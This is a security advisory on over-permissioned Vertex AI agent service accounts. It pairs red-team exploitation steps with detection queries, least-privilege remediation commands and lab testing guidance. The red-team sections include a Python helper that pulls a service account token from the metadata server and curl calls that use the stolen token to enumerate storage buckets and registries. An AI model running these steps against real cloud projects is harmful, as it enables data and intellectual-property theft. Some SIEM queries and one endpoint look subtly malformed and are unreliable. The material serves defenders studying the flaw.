Vertex AI Vulnerability Exposes Google Cloud Data and Private Artifacts

Google Cloud Vertex AI Agent Misconfiguration Exposes Sensitive Data and Code
For General Readers (Journalistic Brief)
Security researchers have uncovered a significant flaw in Google Cloud's Vertex AI platform that could have exposed sensitive customer information and proprietary code. The issue stems from the default setup of AI agents, which were granted broader access than necessary for their tasks.
Think of it like giving a new employee a master key to your entire office building, including the executive suites and the secure vault, just so they can perform a single task in one room. This default configuration meant that if an attacker managed to compromise one of these AI agents, they could potentially use its extensive permissions to steal confidential business documents, customer lists, or other critical data stored within Google Cloud.
Even more concerning, this over-permissioning could have allowed attackers to download private code repositories. This is akin to stealing a company's most valuable intellectual property, its secret blueprints and internal strategies, providing a significant advantage to competitors or malicious actors.
While Google has since updated its guidance to help users secure these AI agents, this incident serves as a critical reminder for any organization leveraging cloud-based AI services. It underscores the importance of carefully managing permissions, ensuring that AI tools and services only have access to the precise data and resources they absolutely need to function, a fundamental security principle known as "least privilege."
Technical Deep-Dive
1. Executive Summary
Palo Alto Networks Unit 42 has identified a critical security vulnerability within Google Cloud's Vertex AI platform, specifically related to the default Identity and Access Management (IAM) configuration of Per-Project, Per-Product Service Agents (P4SAs) used by AI agents. This default misconfiguration grants these agents excessive permissions, allowing a compromised or improperly managed AI agent to exfiltrate sensitive customer data from Google Cloud Storage (GCS) buckets and access private Google-owned Artifact Registry repositories. This could lead to the exposure of proprietary code and internal infrastructure details. Google has since updated its documentation and provided mitigation guidance, emphasizing the urgent need for the Principle of Least Privilege (PoLP) in AI agent deployments.
CVSS Score: Not publicly disclosed.
Affected Products: Google Cloud Vertex AI, specifically the Agent Engine's utilization of Per-Project, Per-Product Service Agents (P4SAs).
Severity Classification: Critical, due to the potential for extensive sensitive data exfiltration and intellectual property theft.
2. Technical Vulnerability Analysis
CVE ID and Details: No specific CVE ID has been publicly assigned or disclosed for this vulnerability as of the source publication date.
- Publication Date: March 31, 2026 (as per The Hacker News article referencing Palo Alto Networks Unit 42 research).
- Known Exploited Status: Not publicly disclosed.
- CVSS Metrics: Not publicly disclosed.
Root Cause (Code-Level): This vulnerability is fundamentally a configuration-based security flaw, not a traditional code exploit. The root cause is the default, overly permissive IAM role assignments to the Per-Project, Per-Product Service Agent (P4SA) utilized by Vertex AI agents deployed via the Agent Engine. The core weakness is the implicit trust and excessive permissions granted to these service agents by default, directly violating the Principle of Least Privilege (PoLP).
- CWE: This issue aligns with CWE-269: Improper Privilege Management and CWE-732: Incorrect Permission Assignment for Critical Resource.
Affected Components:
- Google Cloud Vertex AI platform.
- Per-Project, Per-Product Service Agents (P4SAs) provisioned for Vertex AI Agent Engine deployments.
- Google Cloud Storage (GCS) buckets within customer projects.
- Private Google-owned Artifact Registry repositories.
Attack Surface:
- The Vertex AI Agent Engine's deployment mechanism for AI agents.
- The Google Cloud metadata service, which provides credentials and execution context to compute instances.
- The IAM policies governing the default P4SA roles.
3. Exploitation Analysis (Red-Team Focus)
Red-Team Exploitation Steps:
- Prerequisites: A Vertex AI agent must be deployed using the Agent Engine with the default P4SA configuration. The attacker must achieve initial code execution within the environment where the AI agent is running, or compromise the AI agent's application logic.
- Access Requirements: The attacker needs to be able to execute arbitrary code within the context of the compromised AI agent or its underlying execution environment. This can be achieved through:
- Compromised credentials for the GCP project hosting the agent.
- Exploitation of a vulnerability within the AI agent's application code, enabling arbitrary code execution.
- Lateral movement from another compromised resource within the same GCP project.
- Exploitation Steps:
- Upon achieving code execution within the agent's context, the attacker triggers the agent to query the Google Cloud metadata service.
- The metadata service endpoint (e.g., `http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token`) is invoked to retrieve the P4SA's active access token.
- The attacker then uses this retrieved P4SA access token to authenticate to the Google Cloud API.
- With the authenticated session, the attacker can enumerate and access GCS buckets within the customer's project (e.g., via `gsutil ls` or equivalent API calls).
- Similarly, the attacker can leverage the token to access private Artifact Registry repositories.
- Payload Delivery: The "payload" is not a traditional executable but the attacker's subsequent actions using the exfiltrated credentials and access. This includes data exfiltration, code theft, and further reconnaissance.
- Post-Exploitation:
- Data Exfiltration: Downloading sensitive data from GCS buckets.
- Intellectual Property Theft: Downloading proprietary container images or other artifacts from Artifact Registry.
- Reconnaissance: Mapping the GCP environment, identifying additional sensitive resources, or discovering further vulnerabilities.
- Lateral Movement: Potentially using the P4SA's permissions to access other services or resources within the project, or even cross-project if the P4SA has been granted such roles (though the report focuses on per-project scope).
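The credential-theft step at the heart of this chain can be reproduced in a lab with a few lines of Python. This is an illustrative sketch for authorized testing only: the helper names are ours, and the live request succeeds only from inside a GCP compute environment with an attached service account.

```python
import json
import urllib.request

# Metadata server endpoint that exposes the attached service account's token.
METADATA_TOKEN_URL = (
    "http://metadata.google.internal/computeMetadata/v1/"
    "instance/service-accounts/default/token"
)

def parse_token_response(body: bytes) -> str:
    """Extract the bearer token from the metadata server's JSON response."""
    return json.loads(body)["access_token"]

def fetch_default_token() -> str:
    """Request the default service account's token (only works inside GCP)."""
    req = urllib.request.Request(
        METADATA_TOKEN_URL,
        headers={"Metadata-Flavor": "Google"},  # mandatory, or the server refuses
    )
    with urllib.request.urlopen(req, timeout=5) as resp:
        return parse_token_response(resp.read())
```

Any process in the agent's environment that can issue this one HTTP request obtains a live bearer token, which is why local code execution is the only real prerequisite.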
What privileges are needed?
- Local/Remote: Local code execution within the AI agent's environment is necessary.
- Admin/User: Not necessarily administrative privileges on the host OS, but the capability to execute code that can initiate HTTP requests to the metadata service is critical.
- Pre-auth/Post-auth: This vulnerability is effectively post-authentication in the sense that the attacker must gain access to the AI agent's execution context. However, the P4SA itself is authenticated to Google Cloud via its service account credentials, which are implicitly exposed through the metadata service. The attacker exploits these pre-existing credentials.
Network Requirements?
- The AI agent's execution environment must have network connectivity to the Google Cloud metadata service endpoint (`metadata.google.internal`). This is typically available within GCP compute environments.
- The attacker's compromised environment must possess egress connectivity to Google Cloud APIs to effectively utilize the exfiltrated credentials.
Public PoCs and Exploits: No specific public PoC exploit names or URLs were provided in the source article. The research was detailed by Palo Alto Networks Unit 42.
Exploitation Prerequisites:
- Deployment of a Vertex AI agent using the Agent Engine.
- Utilization of the default Per-Project, Per-Product Service Agent (P4SA) without explicit permission hardening.
- Attacker must achieve code execution within the AI agent's operational environment.
Automation Potential: The process of querying the metadata service and subsequently using the obtained token to access resources is highly automatable using scripting languages (e.g., Python with Google Cloud SDK libraries, or `gsutil` commands). The attack is well-suited for automated data exfiltration once initial access is established. Worm-like propagation is unlikely unless the P4SA has cross-project permissions or the attacker can directly compromise other agents.
Attacker Privilege Requirements:
- Unauthenticated: No.
- Low-privilege: Yes, if "low-privilege" refers to the ability to execute code within the AI agent's container or VM instance, which may not require root or administrative privileges on the underlying host.
- Admin: Not necessarily administrative privileges on the host, but the ability to interact with the GCP metadata service is paramount.
- Supply-chain position: Not directly, but if the AI agent itself is compromised via a supply-chain attack on its dependencies, that would represent an indirect attack vector.
Worst-Case Scenario:
- Confidentiality: Complete exfiltration of all sensitive data stored in GCS buckets within the affected project. This could encompass Personally Identifiable Information (PII), financial data, trade secrets, intellectual property, and operational logs.
- Integrity: While the primary impact described is read access, an attacker with P4SA credentials could potentially have write permissions if the default roles were even broader or if the attacker could chain this with other vulnerabilities. However, based on the report, the focus is on unauthorized read access.
- Availability: Not directly impacted by read-only access. However, if the attacker were to disrupt the AI agent's operations or utilize its compute resources for malicious purposes, availability could be indirectly affected. The theft of proprietary code could also impact Google's service availability and competitive standing.
4. Vulnerability Detection (SOC/Defensive Focus)
How to Detect if Vulnerable:
- Configuration Review: The primary detection method involves auditing the IAM policies applied to Vertex AI service accounts. Specifically, verify if the default P4SA is in use and if it has been granted roles beyond the minimum required (e.g., `roles/storage.objectViewer` and `roles/artifactregistry.reader`).
- Command/Script:

```bash
# Example using gcloud CLI to list IAM policies for a service account
# Replace 'YOUR_PROJECT_ID' and 'YOUR_SERVICE_ACCOUNT_EMAIL'
gcloud projects get-iam-policy YOUR_PROJECT_ID \
  --flatten="bindings[].members" \
  --filter="bindings.members:serviceAccount:YOUR_SERVICE_ACCOUNT_EMAIL" \
  --format="table(bindings.role, bindings.members)"
```

This command lists all roles assigned to a specific service account. Identify roles that grant broad access (e.g., `roles/editor`, `roles/owner`, or excessive read permissions across multiple services).
- Configuration Artifacts: Review IaC (Infrastructure as Code) templates such as Terraform, Pulumi, or CloudFormation used for deploying Vertex AI agents. Look for explicit definitions of service accounts and their IAM bindings. The absence of such explicit definitions, or reliance on default service accounts, indicates a potential vulnerability.
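The audit step above is straightforward to automate. A minimal sketch, assuming the policy is exported with `gcloud projects get-iam-policy YOUR_PROJECT_ID --format=json`; the set of "broad" roles below is an illustrative subset we chose, not an official classification:

```python
import json

# Roles broader than a typical Vertex AI agent needs (illustrative subset).
BROAD_ROLES = {
    "roles/editor",
    "roles/owner",
    "roles/viewer",
    "roles/storage.admin",
    "roles/artifactregistry.admin",
}

def flag_broad_roles(policy_json: str, sa_email: str) -> list:
    """List overly broad roles bound to sa_email in a get-iam-policy JSON dump."""
    policy = json.loads(policy_json)
    member = f"serviceAccount:{sa_email}"
    return sorted(
        binding["role"]
        for binding in policy.get("bindings", [])
        if member in binding.get("members", []) and binding["role"] in BROAD_ROLES
    )
```

Running this over every service account used by an Agent Engine deployment gives a quick shortlist of accounts that need hardening.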
Indicators of Compromise (IOCs):
- File Hashes: Not directly applicable as this is not malware-based exploitation.
- Network Indicators:
- Unusual or high-volume traffic patterns from compute instances running Vertex AI agents to GCS API endpoints or Artifact Registry API endpoints.
- Access to GCS buckets or Artifact Registry repositories from IP addresses or service accounts not typically associated with those resources.
- Suspicious queries to the Google Cloud metadata service from unexpected processes or at anomalous times.
- Process Behavior Patterns:
- Processes on Vertex AI agent compute instances making HTTP requests to `metadata.google.internal`.
- Execution of `gsutil` commands or Google Cloud SDK client libraries for GCS or Artifact Registry from unexpected processes.
- Registry/Config Changes: Not directly applicable.
- Log Signatures:
- GCS Audit Logs: Entries indicating `storage.objects.list` or `storage.objects.get` operations performed by the P4SA against buckets it should not access.
- Artifact Registry Audit Logs: Entries indicating `artifactregistry.repositories.list`, `artifactregistry.packages.list`, `artifactregistry.versions.list`, or `artifactregistry.dockerimages.list` operations performed by the P4SA against repositories it should not access.
- Cloud Logging (Metadata Service Access): Logs showing frequent or anomalous requests to the metadata service originating from the agent's compute instance.
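These log signatures translate directly into a programmatic filter. A sketch assuming entries follow the Cloud Audit Log JSON structure (`protoPayload.authenticationInfo.principalEmail`, `protoPayload.methodName`); the allow-list of expected buckets is something each team must supply:

```python
# GCS read operations named in the audit-log signatures above.
SUSPICIOUS_METHODS = {"storage.objects.list", "storage.objects.get"}

def is_suspicious_p4sa_read(entry: dict, allowed_buckets: set) -> bool:
    """Flag a GCS audit entry where a service agent reads an unexpected bucket."""
    proto = entry.get("protoPayload", {})
    principal = proto.get("authenticationInfo", {}).get("principalEmail", "")
    method = proto.get("methodName", "")
    bucket = entry.get("resource", {}).get("labels", {}).get("bucket_name", "")
    return (
        principal.startswith("service-")   # Google-managed service agents
        and method in SUSPICIOUS_METHODS
        and bucket not in allowed_buckets  # outside the agent's expected scope
    )
```

A filter like this can run over an exported log sink before the events ever reach a SIEM.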
SIEM Detection Queries:
1. KQL (Azure Sentinel/Microsoft Defender for Cloud) - Detecting Suspicious GCS Access from Vertex AI Instances:
```kql
// Detects GCS object listing or getting operations from a Vertex AI compute instance
// that are not part of normal operational patterns or originate from unexpected service accounts.
// Assumes Cloud Audit Logs for GCS are ingested.
GCP_CLOUDAUDIT_RESOURCES
| where Resource.type == "gcs_bucket"
| where Operation.name has_any ("google.storage.v1.Storage.ListObjects", "google.storage.v1.Storage.GetObject")
| extend CallerIdentity = tostring(protoPayload.authenticationInfo.principalEmail)
| extend SourceInstance = tostring(protoPayload.requestMetadata.callerSuppliedIp) // May need adjustment based on log structure
| extend TargetBucket = tostring(Resource.labels.bucket_name)
| where CallerIdentity startswith "service-" // Filter for service accounts
| where CallerIdentity contains "vertex-ai-agent" // Heuristic to identify potential P4SA
| summarize count() by CallerIdentity, SourceInstance, TargetBucket, Operation.name, bin(TimeGenerated, 1h)
| where count_ > 5 // Threshold for suspicious activity, adjust based on baseline
| project TimeGenerated, CallerIdentity, SourceInstance, TargetBucket, OperationName=Operation.name, Count=count_
```

Explanation: This query targets Google Cloud Audit Logs for GCS. It identifies `ListObjects` or `GetObject` operations performed by service accounts that appear to be associated with Vertex AI agents. The `count_ > 5` threshold (adjustable) flags instances with a high volume of such operations within an hour, potentially indicating unauthorized data access.
2. SPL (Splunk) - Detecting Artifact Registry Access Anomalies:
```spl
index=gcp_audit_logs resource.type="artifactregistry.googleapis.com/Repository"
    operation.name IN ("google.devtools.containerregistry.v1.ContainerRegistry.ListImages", "google.devtools.containerregistry.v1.ContainerRegistry.GetImage")
    protoPayload.authenticationInfo.principalEmail=~"service-.*@.*.iam.gserviceaccount.com"
| rex "service-(?P<ProjectNumber>\d+)@"
| search protoPayload.authenticationInfo.principalEmail=~"vertex-ai-agent" OR protoPayload.authenticationInfo.principalEmail=~"p4sa"
| stats count by protoPayload.authenticationInfo.principalEmail, protoPayload.requestMetadata.callerSuppliedIp, resource.labels.repository_name, operation.name, bin(1h)
| where count > 10
| project _time, CallerIdentity=protoPayload.authenticationInfo.principalEmail, SourceIp=protoPayload.requestMetadata.callerSuppliedIp, Repository=resource.labels.repository_name, Operation=operation.name, EventCount=count
```

Explanation: This Splunk query focuses on Artifact Registry audit logs. It identifies operations related to listing or getting images performed by service accounts that are likely P4SAs (matched via a `vertex-ai-agent`/`p4sa` naming heuristic). The `stats` command aggregates these events, and the `where count > 10` clause flags potential anomalous activity based on volume.
Behavioral Indicators:
- Unusual Data Access Patterns: A Vertex AI agent attempting to access a large number of GCS objects, or objects outside its expected functional scope.
- Large Data Transfers: Significant outbound data transfer from the Vertex AI instance, especially to external destinations or unapproved GCS buckets.
- Artifact Registry Enumeration: Frequent calls to list repositories, packages, or images within Artifact Registry that are not directly related to the agent's task.
- Metadata Service Probing: Repeated, systematic queries to the metadata service from the agent's host, especially if not tied to legitimate agent operations.
- Execution of Cloud CLI Tools: Unexpected execution of `gsutil`, `gcloud`, or `docker pull` commands from within the agent's environment.
5. Mitigation & Remediation (Blue-Team Focus)
Official Patch Information: Google has not released a traditional software patch. Mitigation is achieved through configuration changes and adherence to security best practices.
- Updated Documentation: Google has revised Vertex AI documentation to emphasize the Principle of Least Privilege (PoLP) for service accounts.
- Guidance for Custom Service Accounts: Recommendations are provided for creating and utilizing custom, least-privilege service accounts for Vertex AI agents.
- Patch Availability Date: Not applicable. Mitigation is configuration-based.
- Version Numbers that Fix: Not applicable.
Workarounds & Temporary Fixes:
- Immediate Action: Cease using the default Per-Project, Per-Product Service Agent (P4SA) for Vertex AI agents.
- Create Custom Service Accounts: For every Vertex AI agent deployment, provision a new, dedicated service account.
- Grant Minimal Permissions: Assign only the absolute minimum IAM roles required for the agent to perform its specific function.
- For GCS access: Grant `roles/storage.objectViewer` for read-only access. If write access is required, grant `roles/storage.objectCreator` or `roles/storage.objectAdmin` only to specific buckets, not all buckets in the project.
- For Artifact Registry access: Grant `roles/artifactregistry.reader` for read-only access to specific repositories or artifacts.
- Service Account Isolation: Ensure service accounts are scoped to the project they operate within, unless cross-project access is explicitly required and justified.
- Review Existing Deployments: Conduct an immediate audit of all existing Vertex AI agent deployments. Identify those utilizing default P4SAs and migrate them to custom, least-privilege service accounts.
- Network Segmentation (if applicable): While GCP's network is inherently secure, ensure that compute instances running Vertex AI agents are not unnecessarily exposed to public networks if not required.
Manual Remediation Steps (Non-Automated):
- Identify Vulnerable Deployments:
- Utilize the Google Cloud Console or `gcloud` CLI to list all Vertex AI endpoints/agents.
- For each agent, determine the service account it is configured to use.
- Query IAM policies for these service accounts to identify broad permissions.

```bash
# List all service accounts in a project
gcloud iam service-accounts list --project=YOUR_PROJECT_ID

# For each identified service account, list its IAM policies
gcloud projects get-iam-policy YOUR_PROJECT_ID \
  --flatten="bindings[].members" \
  --filter="bindings.members:serviceAccount:SERVICE_ACCOUNT_EMAIL" \
  --format="table(bindings.role, bindings.members)"
```

- Create a New Custom Service Account:

```bash
gcloud iam service-accounts create vertex-ai-agent-sa \
  --display-name "Vertex AI Agent Custom SA" \
  --project=YOUR_PROJECT_ID
```

- Grant Least Privilege Roles:
- For GCS Read Access (specific bucket):

```bash
gcloud projects add-iam-policy-binding YOUR_PROJECT_ID \
  --member="serviceAccount:vertex-ai-agent-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com" \
  --role="roles/storage.objectViewer" \
  --condition='expression=resource.name.startsWith("projects/_/buckets/YOUR_SPECIFIC_BUCKET_NAME"),title=bucket_access,description=Grant access only to specific bucket'
```

- For Artifact Registry Read Access (specific repository):

```bash
gcloud artifacts repositories add-iam-policy-binding YOUR_REPOSITORY_NAME \
  --location=YOUR_LOCATION \
  --member="serviceAccount:vertex-ai-agent-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com" \
  --role="roles/artifactregistry.reader"
```

- Update Vertex AI Agent Configuration:
- Modify the Vertex AI agent deployment configuration to utilize the newly created `vertex-ai-agent-sa@YOUR_PROJECT_ID.iam.gserviceaccount.com` service account instead of the default P4SA. This step is highly dependent on the specific Vertex AI deployment method (e.g., SDK, Terraform, Console).
- Deprovision Old P4SA (with caution): After all agents have been migrated, consider disabling or deleting the default P4SA if it is no longer required for any legacy services. Caution: Ensure no other services depend on this default SA before deletion.
Risk Assessment During Remediation:
- Window of Exposure: The risk of exploitation persists until all vulnerable deployments are reconfigured.
- Operational Impact: Migrating service accounts may necessitate redeploying AI agents, potentially causing brief service interruptions if not carefully orchestrated.
- Configuration Errors: Incorrectly assigned new permissions could lead to functional issues for the AI agents or introduce new security gaps.
- Unidentified Deployments: If some Vertex AI agent deployments are missed during the audit, they will remain vulnerable.
6. Supply-Chain & Environment-Specific Impact
CI/CD Impact:
- Build Pipelines: If CI/CD pipelines are responsible for deploying Vertex AI agents, they must be updated to use custom service accounts with least privilege. A compromised CI/CD pipeline could deploy agents with default P4SAs, introducing the vulnerability.
- Artifact Repositories (npm, Docker, PyPI): This vulnerability directly impacts the security of container images stored in Artifact Registry, which are frequently used in CI/CD pipelines. Unauthorized access to these images could expose proprietary build tools, base images, or sensitive configurations.
Container/Kubernetes Impact:
- Docker: Vertex AI agents often operate within Docker containers. If the container runtime or the container image itself is compromised, an attacker could exploit the P4SA. Container isolation mechanisms (e.g., namespaces, cgroups) are crucial but can be bypassed if the underlying service account permissions are excessive.
- Kubernetes: If Vertex AI agents are deployed on Kubernetes, the Kubernetes service account used by the pod must be configured with minimal GCP IAM roles. The vulnerability resides in the GCP IAM role of the GCP service account that the Kubernetes service account is impersonating or bound to, not directly within Kubernetes RBAC itself. Container isolation effectiveness is contingent upon proper Kubernetes security configurations and the underlying GCP IAM policies.
Supply-Chain Implications:
- Weaponization: This vulnerability could be weaponized by adversaries to gain unauthorized access to sensitive customer data or Google's internal intellectual property.
- Dependency Management: The core issue is a misconfiguration in the default setup of a cloud service component (P4SA). It does not directly affect traditional dependency management tools like npm or PyPI. However, it highlights how misconfigurations in cloud infrastructure can create supply-chain-like risks. If an attacker could influence the deployment process of Vertex AI agents, they could ensure default P4SAs are utilized.
7. Advanced Technical Analysis
Exploitation Workflow (Detailed):
- Initial Access: Attacker gains code execution within the Vertex AI agent's execution environment (e.g., a Compute Engine VM or a GKE pod managed by Vertex AI). This could be achieved via a vulnerability in the agent's application code, a compromised dependency, or compromised credentials for the underlying compute resource.
- Metadata Service Interaction: The attacker-controlled code within the agent initiates an HTTP GET request to the instance metadata server: `http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token`. This request must include the `Metadata-Flavor: Google` header.
- Credential Retrieval: The metadata server responds with a JSON payload containing an access token for the default P4SA.

```json
{
  "access_token": "ya29.c.0wB...<long_token>...",
  "expires_in": 3600,
  "token_type": "Bearer"
}
```

- API Authentication: The attacker uses this `access_token` to authenticate to Google Cloud APIs. This is typically done by including the token in the `Authorization: Bearer <access_token>` header of API requests.
- Resource Enumeration & Access:
- GCS: The attacker can now make authenticated calls to the GCS API. For example, to list all buckets in the project:

```bash
curl -H "Authorization: Bearer <access_token>" \
  "https://storage.googleapis.com/storage/v1/b?project=PROJECT_ID"
```

- Artifact Registry: Similarly, authenticated calls can be made to the Artifact Registry API to list repositories, packages, and images. For example, to list repositories:

```bash
curl -H "Authorization: Bearer <access_token>" \
  "https://us-central1-docker.pkg.dev/PROJECT_ID/list"
# (adjust location and API endpoint as needed)
```
- Data/Artifact Exfiltration: Using the retrieved token, the attacker proceeds to download specific objects from GCS or container images from Artifact Registry.
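The enumeration step above can be expressed without the `gcloud` tooling at all, using plain HTTP. A lab-only sketch of building the authenticated GCS list-buckets call and parsing its response (helper names are ours):

```python
import json
import urllib.request

def build_list_buckets_request(project_id: str, access_token: str) -> urllib.request.Request:
    """Build an authenticated GCS bucket-listing request from a (stolen) token."""
    url = f"https://storage.googleapis.com/storage/v1/b?project={project_id}"
    return urllib.request.Request(
        url, headers={"Authorization": f"Bearer {access_token}"}
    )

def bucket_names(response_body: bytes) -> list:
    """Pull bucket names out of a GCS list-buckets JSON response."""
    return [item["name"] for item in json.loads(response_body).get("items", [])]
```

Because these are ordinary, well-formed API calls carrying a valid token, nothing about them looks malformed at the network layer, which is exactly why the detection section leans on behavioral baselines rather than signatures.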
Code-Level Weakness: As previously stated, this is not a code-level vulnerability in the traditional sense. The "weakness" lies in the default IAM policy configuration applied by Google Cloud to the P4SA. The code that interacts with the metadata service is standard and intended, but it becomes a vector for abuse when the service account it represents has excessive permissions.
Related CVEs & Chaining:
- No directly related CVEs were mentioned in the source material.
- This vulnerability could potentially be chained with other vulnerabilities that grant initial code execution within the Vertex AI agent's environment. For instance, if an AI agent's application logic contained a deserialization vulnerability, an attacker could exploit that to gain code execution and subsequently leverage the P4SA's credentials.
- Similar vulnerabilities exist in other cloud environments where default service accounts or roles are overly permissive.
Bypass Techniques:
- WAF/IDS/EDR: Standard network security controls like WAFs, IDS, and EDRs would likely not detect the initial exploitation vector. This is because it involves legitimate API calls authenticated with valid (though misused) service account credentials. Traffic to the metadata service is internal to the GCP network. Subsequent API calls to GCS or Artifact Registry might be flagged if they exhibit unusual patterns (e.g., high volume, access to sensitive buckets), but the authentication itself is not inherently suspicious.
- Sandboxes: Sandboxes might detect the execution of
gsutilor other cloud CLI tools. However, they would require specific rules to flag calls to the metadata service or unusual GCS/Artifact Registry API patterns. The core issue is the excessive permission, not necessarily the execution of a known malicious binary.
8. Practical Lab Testing
Safe Testing Environment Requirements:
- A dedicated, isolated Google Cloud project.
- Network segmentation within GCP to prevent unintended access to other resources.
- A separate, non-production GCP project to simulate a customer environment.
- A controlled environment to deploy a Vertex AI agent (e.g., using a minimal example from Vertex AI documentation).
- Tools for monitoring GCP audit logs (e.g., Cloud Logging, SIEM).
How to Safely Test:
- Set up Isolated GCP Project: Create a new GCP project exclusively for testing purposes.
- Deploy a Test Vertex AI Agent: Utilize a simple, non-sensitive AI agent deployment. Crucially, ensure it is initially configured to use the default P4SA.
- Simulate Attacker Access: Within the agent's execution environment (e.g., a Jupyter notebook or a custom container), develop a script that:
- Makes an HTTP request to `http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token`.
- Uses the retrieved token to attempt to list GCS buckets in the test project (e.g., `gsutil ls`).
- Attempts to list Artifact Registry repositories in the test project.
- Monitor Logs: Observe Cloud Audit Logs for GCS, Artifact Registry, and general activity logs to track the attempted access.
- Remediation Test:
- Create a new, custom service account in the test project.
- Grant it only `roles/storage.objectViewer` for a specific test bucket and `roles/artifactregistry.reader` for a specific test repository.
- Re-execute the attacker script. Verify that unauthorized resource access is now blocked.
- Vulnerability Scan (Conceptual): Develop a script that queries IAM policies for service accounts associated with Vertex AI deployments and flags those with overly broad roles.
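Both the conceptual scan and the remediation verification can be driven by a tiny role-to-permission model. The mapping below is an illustrative subset we invented for the lab (the authoritative permission lists come from `gcloud iam roles describe ROLE`), but it is enough to assert that the hardened agent can read its own resources and nothing else:

```python
# Minimal role -> permission map for the lab scenario (illustrative subset only).
ROLE_PERMISSIONS = {
    "roles/storage.objectViewer": {"storage.objects.get", "storage.objects.list"},
    "roles/artifactregistry.reader": {
        "artifactregistry.repositories.get",
        "artifactregistry.packages.list",
    },
    "roles/editor": {
        "storage.objects.get", "storage.objects.list",
        "storage.objects.create", "storage.objects.delete",
        "artifactregistry.repositories.get",
    },
}

def access_allowed(granted_roles, permission) -> bool:
    """Check whether any granted role carries the requested permission."""
    return any(permission in ROLE_PERMISSIONS.get(r, set()) for r in granted_roles)
```

Before/after remediation, the same assertions should flip: the default-P4SA configuration passes checks it should fail, while the custom least-privilege account fails everything outside its narrow scope.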
Test Metrics:
- Successful Unauthorized Access: Quantify the number of GCS buckets/objects or Artifact Registry artifacts accessed by the attacker script when using the default P4SA.
- Failed Unauthorized Access: Quantify the number of GCS buckets/objects or Artifact Registry artifacts that the attacker script fails to access after remediation.
- Time to Detect: Measure the time taken for logs to appear in the SIEM and for alerts to trigger for suspicious metadata service access or resource enumeration.
- Time to Remediate: Measure the time taken to create a custom service account, assign minimal roles, and reconfigure the Vertex AI agent.
9. Geopolitical & Attribution Context
- Is there evidence of state-sponsored involvement? No public evidence or reporting suggests state-sponsored involvement for this specific vulnerability. The analysis focuses on a technical misconfiguration.
- Targeted Sectors: Not applicable. The vulnerability affects any Google Cloud customer using Vertex AI with default P4SA configurations.
- Attribution Confidence: Currently unconfirmed.
- Campaign Context: Not publicly linked to any known threat actor campaigns.
10. References & Sources
- Palo Alto Networks Unit 42 Research (as reported by The Hacker News).
- The Hacker News Article: "Vertex AI Service Agent Misconfiguration Exposes Customer Data, Code" (Published March 31, 2026).
- Google Cloud Documentation (updated post-discovery, specific URL not provided in source).
- NVD/CVE: No specific CVE ID publicly assigned as of source publication.
